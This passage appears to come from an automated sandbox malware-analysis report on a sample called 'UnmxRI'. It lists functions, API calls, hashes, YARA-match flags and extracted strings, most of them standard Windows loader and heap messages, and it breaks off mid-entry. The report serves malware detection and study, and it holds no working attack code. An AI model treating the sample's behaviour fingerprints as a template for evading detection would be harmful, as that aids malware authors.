                                  • Instruction ID: a11856767b2824dd571eacd08378298d34a79faaf482879d3094d2b8d7d73807
                                  • Opcode Fuzzy Hash: 223950775bd89aedc105007af6250a8d62a0853226863e749bb097a5168400ba
                                  • Instruction Fuzzy Hash: 4590026120240007460571584414616400AD7E2301B55C025E301C590DC625CAA96226
                                  Function 018E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 85c1b7a7985e97736a0bda968a11c2e5b919248ddc83898fb2fa53fa38d0ba34
                                  • Instruction ID: bb7907eaa22fb6f2295811ee3f39f1b820d3c0cdbee36de34bc5c263746ad59f
                                  • Opcode Fuzzy Hash: 85c1b7a7985e97736a0bda968a11c2e5b919248ddc83898fb2fa53fa38d0ba34
                                  • Instruction Fuzzy Hash: 1F90023120140417D611715845047070009D7D2341F95C416A242C558DD756CB6AA222
                                  Function 018E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b12c1618569abd2d2734cc0cfbc19f1d2f2b33453eb2166e77c3f5c56339881f
                                  • Instruction ID: 06929106df72ffc00045b8c06b942e422ab1033ee27a07defb8cd5258655930e
                                  • Opcode Fuzzy Hash: b12c1618569abd2d2734cc0cfbc19f1d2f2b33453eb2166e77c3f5c56339881f
                                  • Instruction Fuzzy Hash: B190023120148806D6107158840474A0005D7D2301F59C415A642C658DC795CAA97222
                                  Function 018E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9c2a4077b708a110f7856d492cbf7528d1ff16c17705fafc1e5f14799b260789
                                  • Instruction ID: 3a0f1ae34f5bf9daeda63350940c730a42cb9109f64e8e98303b49f71b373174
                                  • Opcode Fuzzy Hash: 9c2a4077b708a110f7856d492cbf7528d1ff16c17705fafc1e5f14799b260789
                                  • Instruction Fuzzy Hash: 2190023160550406D600715845147061005D7D2301F65C415A242C568DC795CB6966A3
                                  Function 00413D67 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 00413E1D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: #$y14291878$y14291878
                                  • API String ID: 1836367815-3963701365
                                  • Opcode ID: 92e53b7856295067d35fa03e05042c641bb8f4ccdcf1a668511e1427a0d8bd16
                                  • Instruction ID: 9727557bda66fe2707259eabe0eae1d776fd0b8c2952dba9b3d273e4bada4c9c
                                  • Opcode Fuzzy Hash: 92e53b7856295067d35fa03e05042c641bb8f4ccdcf1a668511e1427a0d8bd16
                                  • Instruction Fuzzy Hash: 53117AB2E0835836DB20AD90BD02FEF776C8B41B11F00406AF900BB281C67CAE4247E9
                                  Function 00413D9B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 18 413d9b-413dd1 call 42a483 call 42ae93 24 413dd7-413e0e call 404a23 call 423fe3 18->24 25 413dd2 call 417583 18->25 30 413e30-413e35 24->30 31 413e10-413e21 PostThreadMessageW 24->31 25->24 31->30 32 413e23-413e2d 31->32 32->30
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 00413E1D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: c705459bc184b76f80768140e04cc3f0a78c45b20e83c07d9aae79029cdffe56
                                  • Instruction ID: f1ca0926c5bc2796fbc1a252b9af93191358ccc6844b18fdfa677d22cf42928b
                                  • Opcode Fuzzy Hash: c705459bc184b76f80768140e04cc3f0a78c45b20e83c07d9aae79029cdffe56
                                  • Instruction Fuzzy Hash: 90110831E4035877DB21AA919C02FDFBB7C8F41B54F05405AFA047B281D6BC6B068BEA
                                  Function 00413DA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 33 413da3-413dd1 call 42a483 call 42ae93 38 413dd7-413e0e call 404a23 call 423fe3 33->38 39 413dd2 call 417583 33->39 44 413e30-413e35 38->44 45 413e10-413e21 PostThreadMessageW 38->45 39->38 45->44 46 413e23-413e2d 45->46 46->44
                                  APIs
                                  • PostThreadMessageW.USER32(y14291878,00000111,00000000,00000000), ref: 00413E1D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: y14291878$y14291878
                                  • API String ID: 1836367815-3481950456
                                  • Opcode ID: 18722e8978270a854517803c38c06521881c1e4ec998581005c27b7273819ca2
                                  • Instruction ID: 5da27b0ec249fa1e4047802df7e0233cfde22ae490be49b1b8cec66c8d967651
                                  • Opcode Fuzzy Hash: 18722e8978270a854517803c38c06521881c1e4ec998581005c27b7273819ca2
                                  • Instruction Fuzzy Hash: 3E01C871E4035877DB11AA919D02FDF7B7C8F41B54F44405AFA047B281D6BC5B0687AA
                                  Function 00428913 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 47 428913-428957 call 404ab3 call 4295e3 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(e$A,?,?,?,00000000,e$A,?,00412465,?,?), ref: 00428952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: e$A
                                  • API String ID: 3298025750-1097744505
                                  • Opcode ID: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction ID: 306dcccc7717ca06e6cb9c637d6d05715204a61176a37d71f580e900af5864a9
                                  • Opcode Fuzzy Hash: f5a857d019015dd6c76b061e12c0e869e2bfc68254b7ecdba7d9c443784d1b04
                                  • Instruction Fuzzy Hash: F5E06DB27402097BDA14EE59EC41EEB73ACEFC4710F404019FA08A7246CA70B9118BF8
                                  Function 004288C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00419BA0,?,?,00419BA0,?,?,?,00419BA0,?,00002000), ref: 004288FF
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction ID: 5da05892f78c69ae145d3c78cfd63c5040b213e0da63c13699ffa099c9818ceb
                                  • Opcode Fuzzy Hash: a7e695eacb8e5dd47c11152801a9753f1a8b6d1b3f7953a1828acab94111fece
                                  • Instruction Fuzzy Hash: 13E06D722002057BDA10EE59DC45FDB73ECEFC8710F004419FD08A7242C671B9108BB8
                                  Function 00428963 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ExitProcess.KERNEL32(?,00000000,?,?,AD9ECF88,?,?,AD9ECF88), ref: 00428993
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: 10c1ab4faa58adbda06ec85bfe7b85b649a3711cf4a4a3974394aea0dd5015a8
                                  • Instruction ID: 7f5700d8211b0a7d1b77ea3ac933684ac5d072cde437246ec45ad0249f1159e1
                                  • Opcode Fuzzy Hash: 10c1ab4faa58adbda06ec85bfe7b85b649a3711cf4a4a3974394aea0dd5015a8
                                  • Instruction Fuzzy Hash: 32E046763002147BD620EA5AEC41E9BB7ADDFC5710F50402AFA48AB242C671A9508AE5
                                  Function 018E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 027338e10cab734102bb599729d8fc95ecb8f316688d690991ce5fddb3eaa78c
                                  • Instruction ID: bb474d082fac1af3b01111541aa8a44a2111d560bf077d08218a15e28203e4da
                                  • Opcode Fuzzy Hash: 027338e10cab734102bb599729d8fc95ecb8f316688d690991ce5fddb3eaa78c
                                  • Instruction Fuzzy Hash: 7BB09B719015C5C9DF11E764460C7177955B7D2701F15C065D3038641F4738C2E5E276

                                  Non-executed Functions

                                  Function 01922349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  • Opcode ID: 94450cbefd09f24d87ba151cecbaa32b273601cdff81b120e94572a5ec76b62f
                                  • Instruction ID: 7fecbcaa5c0afcc5eebf04bcdd180f7b8981febc4467ac0902c7768c748e0536
                                  • Opcode Fuzzy Hash: 94450cbefd09f24d87ba151cecbaa32b273601cdff81b120e94572a5ec76b62f
                                  • Instruction Fuzzy Hash: 9D92BF71608352AFE721DF28C880F6BB7E8BB88710F14492DFA98D7255D774E944CB92
                                  Function 018D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                  Download Yara Rule
                                  Strings
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0191540A, 01915496, 01915519
                                  • Critical section address., xrefs: 01915502
                                  • Critical section address, xrefs: 01915425, 019154BC, 01915534
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01915543
                                  • corrupted critical section, xrefs: 019154C2
                                  • Address of the debug info found in the active list., xrefs: 019154AE, 019154FA
                                  • Critical section debug info address, xrefs: 0191541F, 0191552E
                                  • undeleted critical section in freed memory, xrefs: 0191542B
                                  • Thread identifier, xrefs: 0191553A
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019154CE
                                  • double initialized or corrupted critical section, xrefs: 01915508
                                  • Invalid debug info address of this critical section, xrefs: 019154B6
                                  • 8, xrefs: 019152E3
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019154E2
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  • Opcode ID: 409368d26c1aa5ae2138881f4100fbe272bd41f3600025cfd2824199f2544209
                                  • Instruction ID: fe6c1c8eb1570718f82f52b9a65d91d4a34a896c97b2e17d7818a3b762b22575
                                  • Opcode Fuzzy Hash: 409368d26c1aa5ae2138881f4100fbe272bd41f3600025cfd2824199f2544209
                                  • Instruction Fuzzy Hash: 498190B1A40358EFEB20CF99C885FAEBBB9BB4A714F554119F508F7280D375AA41CB50
                                  Function 018D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019124C0
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01912602
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01912412
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019125EB
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0191261F
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01912409
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01912506
                                  • @, xrefs: 0191259B
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01912498
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01912624
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019122E4
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  • Opcode ID: fe4abbf65c642b5f53c510dc3b310a20ce30a06f6033cfd1780d2b5259ac7067
                                  • Instruction ID: 8304913867f0bf197c732446b5f55fbcb34802456f6c8d0877834f5fb0b5574a
                                  • Opcode Fuzzy Hash: fe4abbf65c642b5f53c510dc3b310a20ce30a06f6033cfd1780d2b5259ac7067
                                  • Instruction Fuzzy Hash: D8024EB1D0022D9BDB21DB58CC80B9AB7B9AB55704F5041DAE60DE7241EB70AFC4CF69
                                  Function 01948B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  • Opcode ID: 2ec48af82144b6e889d34af328c3b13f0a31ba64e012e28348c3ddd90b7bd67a
                                  • Instruction ID: 345c34963315b745e004ea96dc4481592af8c074042a09dba75832c037ba447f
                                  • Opcode Fuzzy Hash: 2ec48af82144b6e889d34af328c3b13f0a31ba64e012e28348c3ddd90b7bd67a
                                  • Instruction Fuzzy Hash: 98519A719053069BD729DF588888FABBBECEF94341F14492DEA9DC3241E770D608CB96
                                  Function 01950274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  • Opcode ID: da544709f65f4f0472dda93a46eb06e8b8623d84f0e15bf69439e82aacfbc0e7
                                  • Instruction ID: 248d717c4e74c8ecfab94fc86dcc2cf069843389f47ae75db110395642ea054b
                                  • Opcode Fuzzy Hash: da544709f65f4f0472dda93a46eb06e8b8623d84f0e15bf69439e82aacfbc0e7
                                  • Instruction Fuzzy Hash: 09D1CC31614686DFDB62DF6CC480AADBBF5FF49B05F0C8059F849AB252D7349A82CB11
                                  Function 019289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  • HandleTraces, xrefs: 01928C8F
                                  • AVRF: -*- final list of providers -*- , xrefs: 01928B8F
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01928A3D
                                  • VerifierDebug, xrefs: 01928CA5
                                  • VerifierDlls, xrefs: 01928CBD
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01928A67
                                  • VerifierFlags, xrefs: 01928C50
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: a311c5e23b1f5362a2a933bf8f7a044b2ae7b586bddd08692e7b46281c441a2a
                                  • Instruction ID: a024cf90bfa79b71c6063b3a38b9a1beb71428b08191dfa824384a30621cdbc0
                                  • Opcode Fuzzy Hash: a311c5e23b1f5362a2a933bf8f7a044b2ae7b586bddd08692e7b46281c441a2a
                                  • Instruction Fuzzy Hash: 42912871A05322AFE722EF2CC880F2B77E8AB94B14F05085DFA49AB259D730DD04C795
                                  Function 018AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: 6c6f8929e92bf661148dcb9599a23259d7287d38c2024853c56670c9f73b52ae
                                  • Instruction ID: 2dfcff5fd90352c152c7049c344be5ff26021b66a1e927b1bbdb48d5330f7d87
                                  • Opcode Fuzzy Hash: 6c6f8929e92bf661148dcb9599a23259d7287d38c2024853c56670c9f73b52ae
                                  • Instruction Fuzzy Hash: FDA25B70A0562A8FEB65DF18CD887ADBBB5AF45704F5442E9DA0DE7290DB309E81CF40
                                  Function 018D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: b1ff584273e8afb11fe134ed4b6cf60c0ccf9bd2fc0387fdca6715f651669332
                                  • Instruction ID: c9b18a10b2c8703f5a93d2c0186837506bd3c3e9a3641905466f8495eb0efe08
                                  • Opcode Fuzzy Hash: b1ff584273e8afb11fe134ed4b6cf60c0ccf9bd2fc0387fdca6715f651669332
                                  • Instruction Fuzzy Hash: 2F916C70B0031D9BEB35DF2CD884BAE7BA6BB54B24F140119E508EB389E7748A81C7D1
                                  Function 0189645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 018F9A11, 018F9A3A
                                  • LdrpInitShimEngine, xrefs: 018F99F4, 018F9A07, 018F9A30
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 018F9A01
                                  • apphelp.dll, xrefs: 01896496
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018F9A2A
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018F99ED
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-204845295
                                  • Opcode ID: 56060e7cfb04c842eb44dc97be2740460e83a28b9acb149629b3e64b7de7cb7c
                                  • Instruction ID: 32fb09066d2b5b6d9e945259405d33bf4ea07809310f62bfa7bae00f30ed33e5
                                  • Opcode Fuzzy Hash: 56060e7cfb04c842eb44dc97be2740460e83a28b9acb149629b3e64b7de7cb7c
                                  • Instruction Fuzzy Hash: 685180716083059FEB25DF28D881BAB77E5FB84748F14091DF685D7261E630EB48CB92
                                  Function 018DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 018DC6C3
                                  • LdrpInitializeProcess, xrefs: 018DC6C4
                                  • LdrpInitializeImportRedirection, xrefs: 01918177, 019181EB
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 019181E5
                                  • Loading import redirection DLL: '%wZ', xrefs: 01918170
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01918181, 019181F5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: ef2916bba861288f67db93dc331a1e3c4b206d2e806eb60b0bbd32d0135d9abc
                                  • Instruction ID: d355c5e42c1002409b860f57da14eacf7e259cbec8c1f03e5dc65435b59b171b
                                  • Opcode Fuzzy Hash: ef2916bba861288f67db93dc331a1e3c4b206d2e806eb60b0bbd32d0135d9abc
                                  • Instruction Fuzzy Hash: C431C2726483469BD220EF2CD986E1A77D5FF94B24F04055CF949EB395E620EE04C7A2
                                  Function 018D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0191219F
                                  • RtlGetAssemblyStorageRoot, xrefs: 01912160, 0191219A, 019121BA
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01912180
                                  • SXS: %s() passed the empty activation context, xrefs: 01912165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01912178
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019121BF
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: 02ce811721106e4cce13a90392c3b5bbcfd471c45e1556bb0d9ab9199f3eee3d
                                  • Instruction ID: 7e7ddfe57e62d05c26a6ef4c19b316093c5e247dea342ec17abcaf0292a31dba
                                  • Opcode Fuzzy Hash: 02ce811721106e4cce13a90392c3b5bbcfd471c45e1556bb0d9ab9199f3eee3d
                                  • Instruction Fuzzy Hash: 0531E436A403297BE721EB9A8C81F5A7B79EFA5B50F254059FA08E7244D2709F40C6A1
                                  Function 018E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                  Download Yara Rule
                                  APIs
